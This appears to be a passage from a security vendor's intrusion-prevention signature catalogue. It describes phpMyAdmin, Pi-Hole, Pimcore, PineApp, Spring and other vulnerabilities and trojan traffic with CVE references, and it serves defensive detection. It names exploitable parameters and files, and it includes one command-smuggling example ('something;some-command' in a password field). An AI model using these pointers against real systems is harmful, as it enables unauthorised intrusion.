A vulnerability in phpMyAdmin Devel Team phpMyAdmin

Risk:

Moderate

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Input Validation

Description:

The lack of escaping and input validation on user-supplied input causes a SQL injection vulnerability in phpMyAdmin. A successful exploit allows a remote attacker to execute arbitrary SQL statements with the privileges of the target.

Situation:

File-Text_Phpmyadmin-Searchcontroller-SQL-Injection

References:

CVE-2020-26935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935

Phpmyadmin-Server_sync.php-Backdoor

About this vulnerability:

A phpMyAdmin server_sync.php Backdoor vulnerability.

Risk:

High

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Backdoor

Description:

A compromised version of phpMyAdmin, version 3.5.2.2, distributed during 2012, contains an externally introduced modification in server_sync.php which allows remote attackers to execute arbitrary PHP code via an eval injection attack.

Situation:

HTTP_CSU_Phpmyadmin-Server_sync.php-Backdoor

References:

CVE-2012-5159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5159

BID-55672
http://www.securityfocus.com/bid/55672

OSVDB-85739
http://www.osvdb.org/85739

Phpmyadmin-SQL-Goto-Remote-File-Include-Vulnerability

About this vulnerability:	PhpMyAdmin Remote File Include Vulnerability
Risk:	High
First detected in:	sgpkg-ips-343-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	phpMyAdmin
Type:	Input Validation
Description:	The phpMyAdmin is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.
Situation:	HTTP_CRL-Phpmyadmin-SQL-Goto-Remote-Code-Injection-Compromise

Phpmyadmin-Static-Code-Injection-Vulnerability-CVE-2009-1151

About this vulnerability:

Static code injection vulnerability in setup.php in phpMyAdmin

Risk:

High

First detected in:

sgpkg-ips-333-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Input Validation

Description:

Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file. Successful exploitation leads to remote system compromise.

Situation:

HTTP_CSU-Phpmyadmin-Code-Injection-Remote-Compromise

References:

CVE-2009-1151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1151

BID-34236
http://www.securityfocus.com/bid/34236

Phpmyadmin-Tbl_replace.php-Local-File-Inclusion

About this vulnerability:

A vulnerability in phpMyAdmin

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Input Validation

Description:

A vulnerability in phpMyAdmin, versions 4.0 through 4.8.3, which results in information disclosure or allows remote attackers to execute arbitrary code due to the lack of sanitization of a column in the column info table when tbl_replace.php is executed.

Situation:

HTTP_CS-Phpmyadmin-Tbl_replace.php-Local-File-Inclusion

References:

CVE-2018-19968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19968

phpScheduleIt-PHP-Code-Injection-Vulnerability

About this vulnerability:

A vulnerability in phpScheduleIt reserve.php

Risk:

High

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpScheduleIt

Type:

PHP Injection

Description:

A vulnerability in phpScheculeIt reserve.php which allows remote attackers to execute arbitrary PHP code via the start_date_parameter.

Situation:

HTTP_CRL-phpScheduleIt-PHP-Code-Injection-Vulnerability

References:

CVE-2008-6132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6132

BID-31520
http://www.securityfocus.com/bid/31520

OSVDB-48797
http://www.osvdb.org/48797

PHPStudy-Backdoor-Remote-Code-Execution

About this vulnerability:	A vulnerability in PHPStudy
Risk:	High
First detected in:	sgpkg-ips-1344-5242
Last changed:	sgpkg-ips-1344-5242
Platform:	Generic
Software:	PHPStudy
Type:	Input Validation
Description:	There exists a vulnerability in PHPStudy, versions 2016-2018, which allows remote attackers to execute arbitrary code through the Accept-Charset header if the Accept-Encoding header is set to gzip,deflate.
Situation:	HTTP_CS-PHPStudy-Backdoor-Remote-Code-Execution

PHPUnit-Remote-Code-Execution-CVE-2017-9841

About this vulnerability:

An attempt to exploit a vulnerability in PHPUnit

Risk:

High

First detected in:

sgpkg-ips-1437-5242

Last changed:

sgpkg-ips-1437-5242

Platform:

Generic

Software:

PHPUnit

Type:

Insecure Configuration

Description:

A pre-auth remote code execution vulnerability has been reported in PHPUnit versions before 4.8.28 and 5.6.3. This vulnerability allows attackers to execute arbitrary PHP code via crafted HTTP requests to eval-stdin.php in an externally exposed /vendor folder.

Situation:

HTTP_CSU-PHPUnit-Remote-Code-Execution-CVE-2017-9841

References:

CVE-2017-9841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9841

PHPWAY-Link-Management-Script-Multiple-File-Inclusion-Vulnerabilities

About this vulnerability:

File inclusion vulnerabilities in PHPWAY Link Management Script

Risk:

High

First detected in:

sgpkg-ips-201-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHPWAY Link Management Script

Type:

Input Validation

Description:

There is a file inclusion vulnerability in the PHPWAY Link Management Script. The script does not validate input of various parameters, allowing remote file inclusion and execution of PHP script code in the context of the web server.

Situation:

HTTP_CRL-PHPWAY-Link-Management-Script-Main-Page-Directory-Remote-File-Inclusion
HTTP_CRL-PHPWAY-Link-Management-Script-Page-To-Include-Remote-File-Inclusion

References:

CVE-2008-2270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2270

BID-29234
http://www.securityfocus.com/bid/29234

Phpwiki-Ploticus-Remote-Code-Execution

About this vulnerability:

A Phpwiki Ploticus Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-697-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Phpwiki Ploticus

Type:

Code Injection

Description:

A vulnerability in Phpwiki Ploticus, version 1.5.0, which allow remote attackers to execute arbitrary code via shell metacharacters in the edit[content] parameter to index.php/HeIp.

Situation:

HTTP_CRL-Phpwiki-Ploticus-Remote-Code-Execution

References:

CVE-2014-5519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5519

OSVDB-110576
http://www.osvdb.org/110576

Pi-Hole-Blocklist-OS-Command-Execution

About this vulnerability:

A vulnerability in Pi-Hole

Risk:

High

First detected in:

sgpkg-ips-1254-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pihole

Type:

Input Validation

Description:

There exists a vulnerability in Pi-Hole, versions 4.4 and before, which allows remote attackers to execute arbitrary commands by forcing an update which includes PHP content within the new blocklist.

Situation:

HTTP_CRL-Pi-Hole-Blocklist-OS-Command-Execution

References:

CVE-2020-11108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11108

Pi-Hole-DHCP-Mac-OS-Command-Execution

About this vulnerability:

A vulnerability in Pi-Hole

Risk:

High

First detected in:

sgpkg-ips-1254-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Pihole

Type:

Input Validation

Description:

There exists a vulnerability in Pi-Hole, versions 4.3.2 and before, which allows remote attackers to execute arbitrary commands by adding a MAC address, which includes an RCE, to a new DHCP static lease.

Situation:

HTTP_CRL-Pi-Hole-DHCP-Mac-OS-Command-Execution

References:

CVE-2020-8816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8816

Pi-Hole-Top-Domains-API-Authenticated-Exec

About this vulnerability:

An attempt to exploit a vulnerability in the Pi-Hole Web Interface.

Risk:

High

First detected in:

sgpkg-ips-1434-5242

Last changed:

sgpkg-ips-1434-5242

Platform:

Generic

Software:

Pi-Hole

Type:

Input Validation

Description:

A vulnerability in the the Pi-Hole Web Interface, versions 5.5 and before, which allows remote attackers to execute arbitrary code via the domains parameter, due to insufficient validation.

Situation:

HTTP_CS-Pi-Hole-Top-Domains-API-Authenticated-Exec

References:

CVE-2021-32706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32706

Pi-Hole-Whitelist-OS-Command-Execution

About this vulnerability:	A vulnerability in Pi-Hole
Risk:	High
First detected in:	sgpkg-ips-1344-5242
Last changed:	sgpkg-ips-1344-5242
Platform:	Linux
Software:	Pihole
Type:	Input Validation
Description:	There exists a vulnerability in Pi-Hole, versions 3.3 and before, which allows remote attackers to execute arbitrary code by appending system commands to the domain parameter when adding a new domain.
Situation:	HTTP_CRL-Pi-Hole-Whitelist-OS-Command-Execution

Pi3Web-ISAPI-Denial-of-Service

About this vulnerability:

A Pi3Web ISAPI Denial of Service vulnerability.

Risk:

High

First detected in:

sgpkg-ips-726-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

John Roy Pi3Web

Type:

Input Validation

Description:

A vulnerability in Pi3Web, version 2.0.3 before PL2, which allows remote attackers to cause a denial of service condition by sending a request to a file in the ISAPI directory that is not an executable DLL.

Situation:

HTTP_CSU_Pi3Web-ISAPI-Denial-of-Service

References:

CVE-2008-6938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6938

OSVDB-49998
http://www.osvdb.org/49998

PicoFlat-Pagina-Parameter-File-Inclusion

About this vulnerability:

File inclusion vulnerability in PicoFlat

Risk:

High

First detected in:

sgpkg-ips-196-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PicoFlat

Type:

Input Validation

Description:

There is a file inclusion vulnerability in PicoFlat content manangement system written in PHP scripting language. The software does not validate parameters for the main script correctly allowing inclusion and execution of arbitary PHP code in the context of the web server process.

Situation:

HTTP_CRL-PicoFlat-Pagina-Parameter-File-Inclusion

References:

CVE-2007-5390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5390

BID-26043
http://www.securityfocus.com/bid/26043

OSVDB-37686
http://www.osvdb.org/37686

Pidgin-MSN-MSNP2P-Message-Integer-Overflow

About this vulnerability:

Integer overflow vulnerability in Pidgin instant messaging client

Risk:

Moderate

First detected in:

sgpkg-ips-171-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Pidgin

Type:

Buffer Overflow

Description:

There is an integer overflow vulnerability in Pidgin instant messaging client. By sending a crafted MSNP2P message to the target, a remote attacker can cause a denial of service condition terminating the vulnerable Pidgin process, or execute non-privileged arbitrary code on the target host.

Situation:

HTTP_SS-Pidgin-MSN-MSNP2P-Message-Integer-Overflow
IM-TCP_Pidgin-MSN-MSNP2P-Message-Integer-Overflow
File-Binary_Pidgin-MSN-MSNP2P-Message-Integer-Overflow

References:

CVE-2008-2927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927

BID-29956
http://www.securityfocus.com/bid/29956

OSVDB-46838
http://www.osvdb.org/46838

Pihole-Blocklist-Exec-CVE-2020-11108

About this vulnerability:

Pihole Blocklist Exec CVE-2020-11108

Risk:

High

First detected in:

sgpkg-ips-1254-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Pihole

Type:

Malfunction

Description:

Requests with suitably crafted payloads can make Pihole download and execute arbitrary PHP code from any URL, which can be exploited to execute any code on the target system with the privileges of the daemon.

Situation:

HTTP_CRL-Pihole-Blocklist-Exec-CVE-2020-11108

References:

CVE-2020-11108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11108

Pimcore-Gridhelperservice-SQL-Injection

About this vulnerability:

A vulnerability in Pimcore

Risk:

Moderate

First detected in:

sgpkg-ips-1470-5242

Last changed:

sgpkg-ips-1470-5242

Platform:

Generic

Software:

Pimcore

Type:

Input Validation

Description:

Improper input validation in the /grid-proxy, /get-export-jobs, and /get-batch-jobs APIs causes an SQL injection vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Pimcore-Gridhelperservice-SQL-Injection

References:

CVE-2022-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1429

Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection

About this vulnerability:

A vulnerability in Pimcore

Risk:

High

First detected in:

sgpkg-ips-1642-5242

Last changed:

sgpkg-ips-1642-5242

Platform:

Generic

Software:

Pimcore

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported for Pimcore. This vulnerability is due to improper input validation in the prepareListingForGrid function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

Situation:

HTTP_CRL-Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection

References:

CVE-2023-3820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3820

Pimcore-Key-Field-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Pimcore Pimcore

Risk:

Moderate

First detected in:

sgpkg-ips-1448-5242

Last changed:

sgpkg-ips-1448-5242

Platform:

Generic

Software:

Pimcore

Type:

Input Validation

Description:

Improper validation of the input for the Key field in the Navigation and Properties tab causes a cross-site scripting vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CS-Pimcore-Key-Field-Stored-Cross-Site-Scripting

References:

CVE-2022-0831
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0831

Pimcore-Multiselect-Getfilterconditionext-SQL-Injection

About this vulnerability:

A vulnerability in Pimcore

Risk:

Moderate

First detected in:

sgpkg-ips-1662-5242

Last changed:

sgpkg-ips-1662-5242

Platform:

Generic

Software:

Pimcore

Type:

Input Validation

Description:

Improper input validation in the getFilterConditionExt function causes an SQL injection vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CS-Pimcore-Multiselect-Getfilterconditionext-SQL-Injection

References:

CVE-2023-47637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47637

Pimcore-Rest-API-SQL-Injection

About this vulnerability:

A vulnerability in Pimcore web servies

Risk:

High

First detected in:

sgpkg-ips-1165-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pimcore

Type:

SQL Injection

Description:

A vulnerability in the Pimcore web service REST API which allows remote attackers to obtain usernames and hashed passwords using an SQL injection.

Situation:

HTTP_CSU-Pimcore-Rest-API-SQL-Injection

References:

CVE-2018-14058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14058

Pimcore-Searchcontroller.PHP-SQL-Injection

About this vulnerability:

A vulnerability in Pimcore

Risk:

Moderate

First detected in:

sgpkg-ips-1595-5242

Last changed:

sgpkg-ips-1595-5242

Platform:

Generic

Software:

Pimcore

Type:

Input Validation

Description:

Improper input validation in the search function causes an SQL injection vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CS-Pimcore-Searchcontroller.PHP-SQL-Injection

References:

CVE-2023-1578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1578

Pimcore-Title-Field-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Pimcore Pimcore

Risk:

Moderate

First detected in:

sgpkg-ips-1451-5242

Last changed:

sgpkg-ips-1451-5242

Platform:

Generic

Software:

Pimcore

Type:

Input Validation

Description:

Improper input validation for the Title field in the SEO and Settings tab causes a cross-site scripting vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Pimcore-Title-Field-Stored-Cross-Site-Scripting

References:

CVE-2022-0832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0832

Pimcore-Unserialize-RCE

About this vulnerability:

A vulnerability in Pimcore

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pimcore

Type:

Input Validation

Description:

A vulnerability in Pimcore, versions 4.x and 5.x, which allows remote attackers to execute arbitrary code due to the lack of proper input validation of the bulk-commit method in ClassController.php.

Situation:

HTTP_CRL-Pimcore-Unserialize-RCE

References:

CVE-2019-10867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10867

Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection

About this vulnerability:

A vulnerability in PineApp Mail-SeCure

Risk:

High

First detected in:

sgpkg-ips-541-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

PineApp Mail-SeCure

Type:

Input Validation

Description:

A command injection vulnerability exists in PineApp Mail-SeCure. The vulnerability is due to an input validation error in conflivelog.pl of the administration interface. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.

Situation:

HTTP_CRL-Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection

References:

OSVDB-95780
http://www.osvdb.org/95780

Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection

About this vulnerability:

A vulnerability in PineApp Mail-SeCure

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

PineApp Mail-SeCure

Type:

Input Validation

Description:

A command execution vulnerability exists in PineApp Mail-SeCure. The vulnerability is due to an input validation error in the confpremenu.php script while exporting logs. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.

Situation:

HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection

References:

OSVDB-95783
http://www.osvdb.org/95783

Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection

About this vulnerability:

A vulnerability in PineApp Mail-SeCure

Risk:

High

First detected in:

sgpkg-ips-541-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

PineApp Mail-SeCure

Type:

Input Validation

Description:

A command execution vulnerability exists in PineApp Mail-SeCure. The vulnerability is due to an input validation error in the confpremenu.php script while installing licenses. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.

Situation:

HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection

References:

OSVDB-95784
http://www.osvdb.org/95784

Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution

About this vulnerability:

A vulnerability in PineApp Mail-SeCure

Risk:

Moderate

First detected in:

sgpkg-ips-537-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

PineApp Mail-SeCure

Type:

Malfunction

Description:

There is a remote command execution vulnerability in PineApp Mail-SeCure. The vulnerability is due to exposing of the ldapsyncnow.php file of the administration web interface. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with the privileges of the root user.

Situation:

HTTP_CSU-Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution

References:

OSVDB-95781
http://www.osvdb.org/95781

Pineapp-Mail-Secure-Livelog-Command-Injection

About this vulnerability:

A vulnerability in PineApp Mail-SeCure

Risk:

Moderate

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

PineApp Mail-SeCure

Type:

Input Validation

Description:

There are multiple command Injection vulnerabilities in PineApp Mail-SeCure. These vulnerabilities are due to an input validation errors in the livelog.html of the administration interface. A remote attacker can exploit these vulnerabilities by sending specially crafted requests to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.

Situation:

HTTP_CRL-Pineapp-Mail-Secure-Livelog-Command-Injection

References:

OSVDB-95779
http://www.osvdb.org/95779

Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection

About this vulnerability:

A vulnerability in PineApp Mail-SeCure

Risk:

Moderate

First detected in:

sgpkg-ips-536-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

PineApp Mail-SeCure

Type:

Input Validation

Description:

There is a command injection vulnerability in PineApp Mail-SeCure. The vulnerability is due to lack of sanitation on the iptest parameter in test_li_connection.php of the administration web interface. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with the privileges of the root user.

Situation:

HTTP_CRL-Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection

References:

OSVDB-95782
http://www.osvdb.org/95782

PingPull-Trojan-C2-Traffic

About this vulnerability:	PingPull remote access trojan command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1479-5242
Last changed:	sgpkg-ips-1479-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	PingPull is a remote access trojan that can be used to control the infected system.
Situation:	HTTP_CS-PingPull-Trojan-C2-HTTP-Traffic Generic_CS-PingPull-Trojan-C2-TCP-Traffic ICMP_PingPull-Trojan-C2-ICMP-Echo-Request-Traffic

Pinkslip-Bot

About this vulnerability:	PinkSlip bot traffic detected
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	PinkSlip is a Windows malware that can be remote controlled.
Situation:	Generic_CS-Pinkslip-Bot-Traffic HTTP_CSU-Pinkslip-Bot-Traffic HTTP_CRL-Pinkslip-Bot-Traffic FTP_CS-Pinkslip-Bot-Traffic

Pinkslipbot-Trojan

About this vulnerability:	Pinkslipbot trojan
Risk:	High
First detected in:	sgpkg-ips-310-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Pinkslipbot is a trojan horse program that provides a backdoor to the infected system.
Situation:	HTTP_CRL-Pinkslipbot-Trojan

Piranha-Passwd-Php3-Sys-Compromise

About this vulnerability:

Piranha web GUI exposure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Red Hat Linux 6

Software:

Red Hat Piranha Virtual Server

Type:

Malfunction

Description:

Use of the passwd.php3 CGI script in Red Hat Piranha Virtual Server Package was detected. It is possible for any user who can authenticate to the Piranha package to execute commands by entering 'something;some-command' into the password fields. Everything after the semicolon is executed with the Web server privileges.

References:

CVE-2000-0322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0322

BID-1149
http://www.securityfocus.com/bid/1149

Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service

About this vulnerability:

A vulnerability in Pivotal RabbitMQ

Risk:

Moderate

First detected in:

sgpkg-ips-1219-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pivotal RabbitMQ

Type:

Format String

Description:

There has been report a denial-of-service vulnerability in Pivotal RabbitMQ. Successful exploitation could lead in denial of service conditions.

Situation:

HTTP_CSH-Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service

References:

CVE-2019-11287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11287

Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection

About this vulnerability:

A vulnerability in Pivotal Spring Data Commons

Risk:

Moderate

First detected in:

sgpkg-ips-1105-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pivotal Spring

Type:

Input Validation

Description:

Incorrect input validation in the isWritableProperty function causes an expression language injection vulnerability in the Sprig Framework. A successful exploit may allow an attacker to execute arbitrary code on the target system remotely without authentication.

Situation:

HTTP_CRL-Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection

References:

CVE-2018-1273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1273

Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution

About this vulnerability:

A vulnerability in Pivotal Spring Framework

Risk:

High

First detected in:

sgpkg-ips-1139-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pivotal Spring

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Pivotal Spring Framework. The vulnerability is due to improper handling of user-supplied input to a STOMP broker in the spring-messaging module. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted message to the STOMP broker. Successful exploitation could lead to code execution in the context of the service.

Situation:

WebSocket_CS-Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution

References:

CVE-2018-1270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1270

Pivotal-Spring-Security-oauth-SpelView-Code-Execution

About this vulnerability:

A vulnerability in IBM WebSphere Application Server

Risk:

Moderate

First detected in:

sgpkg-ips-813-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

Improper input validation can be used to exploit Pivotal Spring Security OAuth.

Situation:

HTTP_CRL-Pivotal-Spring-Security-oauth-SpelView-Code-Execution

References:

CVE-2016-4977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4977

Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Piwigo detected

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

Piwigo

Type:

SQL Injection

Description:

A vulnerability in Piwigo, version 13.5.0 and before, which allows remote attackers to retrieve usernames and 13.5.0 and before passwords of other users through SQL injection using the filter_user_id parameter.

Situation:

HTTP_CRL-Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection

References:

CVE-2023-26876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876

PlaySMS-Unauthenticated-Template-Injection-Code-Execution

About this vulnerability:

A vulnerability in PlaySMS

Risk:

High

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix; Linux; Windows

Software:

PlaySMS

Type:

Input Validation

Description:

There exists a vulnerability in PlaySMS, versions before 1.4.3, which allows remote attackers to execute arbitrary code via the username parameter, due to insufficient input validation.

Situation:

HTTP_CRL-PlaySMS-Unauthenticated-Template-Injection-Code-Execution

References:

CVE-2020-8644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8644

Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE

About this vulnerability:

A vulnerability in Plex Media Server plugin

Risk:

High

First detected in:

sgpkg-ips-1344-5242

Last changed:

sgpkg-ips-1344-5242

Platform:

Windows

Software:

Plex Media Server plugin

Type:

Insecure Configuration

Description:

There exists a vulnerability in Plex Media Server plugin, versions prior to 1.19.3, which allows remote attackers to execute arbitrary code by uploading Dict files to custom photo libraries, modifying the local app path to point to these new libraries, and restarting plexapp.system to achieve code execution.

Situation:

HTTP_CSU-Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE

References:

CVE-2020-5741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5741

Plex-Media-Server-Reflection-DDoS-CVE-2021-33959

About this vulnerability:

An attempt to exploit a vulnerability in Plex Media Server detected

Risk:

High

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Plex Media Server

Type:

Input Validation

Description:

Plex media server 1.21 and before is vulnerable to distributed denial-of-service (DDoS) reflection attacks via the plex service.

Situation:

Generic_UDP-Plex-Media-Server-Reflection-DDoS-CVE-2021-33959

References:

CVE-2021-33959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33959

Plixer-Scrutinizer-Authentication-Bypass

About this vulnerability:

A Plixer Scrutinizer Authentication Bypass vulnerability.

Risk:

High

First detected in:

sgpkg-ips-709-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Plixer

Type:

Insecure Configuration

Description:

A vulnerability in Plixer, versions before 9.5.0, in cgi-bin/admin.cgi in the web console, which allows remote attackers to add administrative accounts without authentication, via a userprefs action.

Situation:

HTTP_CRL-Plixer-Scrutinizer-Authentication-Bypass

References:

CVE-2012-2626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2626

OSVDB-84318
http://www.osvdb.org/84318

PluginDetect

About this vulnerability:	PluginDetect, a plugin detector script
Risk:	Moderate
First detected in:	sgpkg-ips-1032-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Javascript Injection
Description:	PluginDetect is a Javascript library used for identifying the plugins that the browser uses.
Situation:	File-Text_PluginDetect-Script

Plugx-Trojan-Activity-Detected

About this vulnerability:	PlugX Trojan
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	PlugX is a Remote Access Tool (RAT). A Remote Access Tool gives an intruder access to the infected machine with administrative rights.
Situation:	HTTP_CSH-Plugx-Trojan-Activity-Detected

PmWiki-Remote-PHP-Code-Injection

About this vulnerability:

A PmWiki Remote PHP Code Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PmWiki

Type:

Input Validation

Description:

A vulnerability in PmWiki, versions 2.0.0 to 2.2.34, in the PageListSort function of scripts/pagelist.php, which allows remote attackers to execute arbitrary code via PHP sequences in a crafted order parameter in a pagelist directive.

Situation:

HTTP_CRL-PmWiki-Remote-PHP-Code-Injection

References:

CVE-2011-4453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4453

BID-50776
http://www.securityfocus.com/bid/50776

OSVDB-77261
http://www.osvdb.org/77261

PNG-GD-Graphics-Library-Rowbytes-And-Height-BOF

About this vulnerability:

Buffer overflow in GD Graphics Librarys PNG handling code

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

GD Graphics Library

Type:

Buffer Overflow

Description:

